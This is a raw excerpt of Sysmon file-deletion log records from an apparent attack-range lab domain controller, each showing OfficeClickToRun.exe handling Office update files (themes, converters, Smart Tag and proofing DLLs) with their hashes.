Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\AXIS.INFMD5=F6E7FF8173E7ED9D0CA315CCEC091659,SHA256=29E05D80BBB5A85FA71C5C9219077F1104CD9AF468C9A97344AD7A411304018B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\AXIS.ELMMD5=18CF8E92F6CF3501F6CAC6746B03C847,SHA256=0B87F8A4D8A6A43933D22367C06406789E31E46D97D7B6175E60531A2F06E55B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNGMD5=F463B38EB6F74778FAF7B256E9F72D2F,SHA256=8179708146C1F63FB89E1B0A420BC8F4A87E737DCD5E590381D639A011E58191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\PREVIEW.GIFMD5=B456A5D76165782C0B6E8C8792320BB8,SHA256=FC92A35C33C60B6AA4C8216E2A21B17F9497E635608860507D3567DDC5A0BF36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\ARCTIC.INFMD5=C2F79371C86D6EC3B2CCED5C53A87D16,SHA256=FAD6AB4C4CAB81E8A6926C20F3F1A2C40F5D39F05A0350B9CDBA4A137767B2E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\ARCTIC.ELMMD5=9597924FA7F81D8896B1CAA3BE6FA6F6,SHA256=72079C372D4353A141C9D34C8FA26207EF1A34E7A4E8BD193A16C221E7F8E78C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\THMBNAIL.PNGMD5=9B55336D8F2BB01A922A8F4CBE79948D,SHA256=612B43318CD6B8EE455ED379F714EDC40945DA576B3BCF8A4C8BACF94987EED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\PREVIEW.GIFMD5=A652E0FBA63EFDE91243D5AF7BDFF63B,SHA256=6EF375CE03721CAE94F26C87EBA4AAF4A3832A77300F1B8A93EC1B2336AD3A66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\AFTRNOON.INFMD5=4B83E7D608AD91CD886263C80A79028B,SHA256=3ACFC662436090CCC40E11E832F1C32B7FF2A07360B17A5F928EB986B2A14D16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\AFTRNOON.ELMMD5=68365BA82747DD7B1E0974542502266B,SHA256=50B77EB23685B14014EC0DBB70579B5668274E64514DBD2D80370DF7AD12440E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\WPFT632.CNVMD5=46D4A43C46D911631405B5A5C9EDF55C,SHA256=C2F014D0D5D6C36ED40AC9B80934EDCEA41BE2669112CA99300DC486607B0839,IMPHASH=68906A61E24957262129F77CEB2581ABtruetrue 23542300x800000000000000071055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\WPFT532.CNVMD5=1EB39E0B370B2B3C002965981413BED2,SHA256=0A022D996522A88042AD98539BE80E94969612034A5E47545FEDE8B26302662D,IMPHASH=C5C6BB3D0079A14A72F1BBD25AF09130truetrue 23542300x800000000000000071054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\RECOVR32.CNVMD5=A160F7B04DBD379786C814D327400757,SHA256=82910363E86DE3C0BA60FBE03C21BCF8DECB101057F285BDF219DA6A8AB10984,IMPHASH=7B9B11E5CC915CC416A100F42644E689truetrue 23542300x800000000000000071053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\MSCONV97.DLLMD5=7D6F7BDA0544645C9AF3CEACB036BEE9,SHA256=FFA6E559161F0906618E04C33EF6B2EF26A34BF9606B25CAEFAD0AD3177F1169,IMPHASH=340B904C2CBB3E5AB1165C08E714E53Ctruetrue 23542300x800000000000000071052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXEMD5=01E7C04765959DDDBD51E19F175D058A,SHA256=28C7366D9E08990EEFAD507CB5595BDC74939EB532E4B97AC06FBB58DB0F89DD,IMPHASH=82AAEB59D4A73A4DEEB6FAA3FE26DDF6truetrue 23542300x800000000000000071051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\SmartTagInstall.exeMD5=0C2E0EB557C61C99B2C2F976F97449ED,SHA256=BBC1139EE490B5B2E21D221BC75B660D76F58D4BFA01763ABD855FEC5D717E68,IMPHASH=96E4B794BF80C87811A9631CF18FC3D6truetrue 23542300x800000000000000071050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\MSTAG.TLBMD5=525ECD5904D15AA6D4362DC1B3DBCE28,SHA256=B72AF21BA8B14BA259BFD3F004445CD5202E15F32DAD53BBC9AE4DBB58A3F24E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\MOFL.DLLMD5=823C892D7D3981410BA654C2C8EB1195,SHA256=55AD613318F0DB3C19E953519637A0AC1BCE79D015B3D79875747D9E2925FFB9,IMPHASH=3D59D1D489CEFC1DDEEB4247FA30BDC7truetrue 23542300x800000000000000071048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\METCONV.TXTMD5=92868B6D600CCB856B40839F64082C6A,SHA256=2735D96B46DDA22A2FEF4B07C665F376D89F57B112A2435CEE2160E57727CE13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\METCONV.DLLMD5=4FE51C208A63C01B48C83E089CADAAB4,SHA256=D48A6431F88C21E3A2487ED8F8BC4249FD36ABE7C3D4AFDD1A4AD057325CABF1,IMPHASH=B28F0D1A53B26948BC88BB91CD8D6528truetrue 23542300x800000000000000071046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\IMCONTACT.DLLMD5=69CCE4BD68C5A0FE491688C1BD17A6EB,SHA256=213C091CB2198721C597C1D039DB71EE048E6C2EF6A209815D7A6546D11DBD0D,IMPHASH=E2EFEBB2F5A7293DA51A3DDDD8CA805Ftruetrue 23542300x800000000000000071045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\IETAG.DLLMD5=0CAA0D5B198452F31777E0F29421217E,SHA256=15C5C768ACDE78DA134D0F893DE9E33BAB3A1AD264FC7EDB0B606BFAD9D7AA26,IMPHASH=773FA367AE470646FBF95FBB373BAC51truetrue 23542300x800000000000000071044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FSTOCK.DLLMD5=1EF453EE6F139A2EA0DE96E43CE58E14,SHA256=D569B25E959C299DD4826E87069416A7FE13141EA7002E14611462658FCEFC77,IMPHASH=C1E49221C4F1CE7B0123867FD4B00280truetrue 23542300x800000000000000071043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FPLACE.DLLMD5=479A230343D2B66C7283D395E4C9321F,SHA256=58F68491AC81DD44D51B8B31B0F638B7F6FCBE7C201FFE88DF6D40040A5AEFD4,IMPHASH=24BC51B1BCD5D99A68582BBEDDDA63FAtruetrue 23542300x800000000000000071042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FPERSON.DLLMD5=9EE5D83044E5872FEDC560D293858BDC,SHA256=7E3A892E612D866326600069F87D3EC6E279C532B990B95E70898A095FA2E7ED,IMPHASH=28FBE67A37EE1BCACA898EF74E3E00A8truetrue 23542300x800000000000000071041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FDATE.DLLMD5=C29EB6FD2C8378DD3008E2CD06C3330B,SHA256=9C9F355F4A0CB551EBD272D79EBBE4D4F793555869104891BFFC2549FC108D24,IMPHASH=ABDB7952EF534B426F988C422EE16011truetrue 23542300x800000000000000071040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.251{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\FBIBLIO.DLLMD5=FA789DCE7FE92A901E1FC8D0A7B6DD3F,SHA256=A7D30AEBDCCF97AE41BD5E0CFCD86987BF8FBBD889B333888BF0EC80FFDC017D,IMPHASH=AD5AFDD2692B9399D0ABE9E1293F46BBtruetrue 23542300x800000000000000071039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\BASMLA.XSLMD5=ABC0D376936D58001E9744051B58A629,SHA256=ED0A5865EA90AB97762DBF6704420909BC6D1926ECC5F3EB570689BDE1AAF595,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\TIME.XMLMD5=A37A2D152C05641CC8374AD33F934D08,SHA256=C98CAEEDA59C585C926FA7941586990BF002D1BC848E01E94AE4EF48D81AF74F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\PHONE.XMLMD5=6F9BF3586040C19871CB0291928FEAFD,SHA256=30AB97F2DFBFBC020787ED9CFDBA0E5202485ECB2BA034EA79508672246F1E9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\LISTS\1033\DATES.XMLMD5=DE3456C5219BDD0740ACDCC74890EF6E,SHA256=C8422CD7CCDA3D06A8F7A5F6EE0B6665330A33499B511AFD24D6FC69E92A5060,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\STINTL.DLLMD5=7CF000A3AA07083D71026BD62CC7B154,SHA256=555B715221CC52D812557C47A9848D679EEF920E8FDAF830A2B928416F910B35,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\MCABOUT.HTMMD5=523B9F41C843F0FA330039D2278DCAB1,SHA256=4B8436F876A48428E3619579662244A16A35669757031D62B8E5B2A4453FA890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_FR.LEXMD5=167ECC9811F4C0D8F7EAC639E3EFAC5E,SHA256=077AFFC0822E3358C7914F55C004C39298D08AF7DE9A43547E235F92B1C47A14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_ES.LEXMD5=C3AAE163579C2C144489B1BB5F5DC586,SHA256=4C3AA0273544387D19627FC829BEB6E3DACC329FC048076D3B2B49CBA41ACAAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_EN.LEXMD5=EB7CB218D0FF5F270E1916D53FE5FBF2,SHA256=5B3A3ECD398C7C68A1F27D516D5078B4C7D8034EF52FA1AB74F1E364FC0E4374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSLID.DLLMD5=E8C112B0F7417BC23A32AE921F1190EA,SHA256=938825CA785C777AF88178D2BA660EDD2C6E88CB1FAA7776F5E2919ABF45F4D7,IMPHASH=A164638C508761FB9FEC0388418C359Btruetrue 23542300x800000000000000071029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\WXPNSE.DLLMD5=F2F56229EDF522A85BC0C1D1BEB0ED80,SHA256=3DFA4233489871F089DAD94565BBC093C5769C5E422242D3D6F15D4AA3812548,IMPHASH=B33CDFC64A1D1DBD1B49567416DBD5E8truetrue 23542300x800000000000000071028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\WISC30.DLLMD5=6FC01BBDD0734252D92D8A1A3CFC0AEA,SHA256=F6A2706D36992954663D0394FFEA0B648E1DAE140A96B508B6A99D7FB0879E21,IMPHASH=5047DAF1BD4962FB7225FFBDFF89927Ctruetrue 23542300x800000000000000071027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140_1.dllMD5=9040ED0FDF4CE7558CBFFB73D4C17761,SHA256=6CC4315DACEB0522816C60678344466CB452426267F70C7FAAE925361674E774,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69truetrue 23542300x800000000000000071026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dllMD5=23105A395B807D9335219958B4D0CEC1,SHA256=61832990E364DCA5BFA2C61D930F00ACAAE6D1AAA3130392403455AE9A1125A5,IMPHASH=F143E2868EFDE0FCB493BD3051708A62truetrue 23542300x800000000000000071025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.173{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft 